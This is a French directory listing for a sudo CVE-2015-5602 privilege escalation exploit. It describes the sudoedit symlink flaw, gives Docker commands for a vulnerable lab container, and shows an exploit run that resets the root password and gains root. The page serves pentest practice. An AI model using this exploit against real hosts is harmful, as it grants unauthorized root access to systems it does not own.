Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
privesc-CVE-2015-5602 — Sudo <= 1.8.14 Élévation de privilèges locale et conteneur vulnérable | Kitploit
Outils/GitHubGitHub/t0kx/privesc-cve-2015-5602
Escalade de PrivilègesSécurité des ConteneursAnalyse des VulnérabilitésExploitationApprentissage et ÉducationLabs et Pratique
GitHubt0kx/privesc-cve-2015-5602

privesc-CVE-2015-5602

Sudo <= 1.8.14 Élévation de privilèges locale et conteneur vulnérable

Voir le dépôt
15223il y a 8 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Sudo <=1.8.14 Élévation de privilèges locale

Sudo (su « do ») permet à un administrateur système de donner à certains utilisateurs (ou groupes d'utilisateurs) la possibilité d'exécuter certaines (ou toutes) commandes en tant que root tout en journalisant toutes les commandes et arguments.

Environnement vulnérable

Pour configurer un environnement vulnérable pour votre test, vous aurez besoin de Docker installé, et exécutez simplement la commande suivante :

root@kitploit:~
docker build -t privesc/cve-2015-5602 .
docker run --rm -it privesc/cve-2015-5602

Et cela générera un shell interactif avec des privilèges utilisateur réduits.

Code vulnérable

Le bug a été trouvé dans sudoedit, qui ne vérifie pas le chemin complet si un joker est utilisé deux fois (p. ex. /home/*/*/esc.txt), cela permet à un utilisateur malveillant de remplacer le fichier réel esc.txt par un lien symbolique vers un emplacement différent (p. ex. /etc/shadow).

Exploiter avec succès ce problème peut permettre à un attaquant de manipuler des fichiers et d'obtenir les privilèges root sur le système hôte via des attaques par lien symbolique.

Exploitation

Pour exploiter cette cible, exécutez simplement :

root@kitploit:~
./exploit.sh

Si vous utilisez cette image vulnérable, vous pouvez simplement exécuter :

root@kitploit:~
user@1cc9cd901b07:~$ sudo -l
User user may run the following commands on 1cc9cd901b07:
    (root) NOPASSWD: sudoedit /home/*/*/esc.txt
user@1cc9cd901b07:~$ ./exploit.sh 
[+] CVE-2015-5602 exploit by t0kx
[+] Creating folder...
[+] Creating symlink
[+] Modify EDITOR...
[+] Change root password to: d03c09dc34c53657aff1f459a86b20ed
[+] Done
user@1cc9cd901b07:~$ su
Password: 
root@1cc9cd901b07:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
root@1cc9cd901b07:/home/user#

Crédits

Cette faille a été découverte par Daniel Svartman.

Avertissement

Ce programme ou tout programme précédent est destiné UNIQUEMENT à des fins éducatives. Ne l'utilisez pas sans autorisation. La clause de non-responsabilité habituelle s'applique, notamment le fait que moi (t0kx) ne suis pas responsable des dommages causés par l'utilisation directe ou indirecte des informations ou fonctionnalités fournies par ces programmes. L'auteur ou tout fournisseur d'accès Internet n'assume AUCUNE responsabilité quant au contenu ou à l'utilisation abusive de ces programmes ou de leurs dérivés. En utilisant ces programmes, vous acceptez le fait que tout dommage (perte de données, crash système, compromission du système, etc.) causé par l'utilisation de ces programmes n'est pas la responsabilité de t0kx.

Télécharger l’outil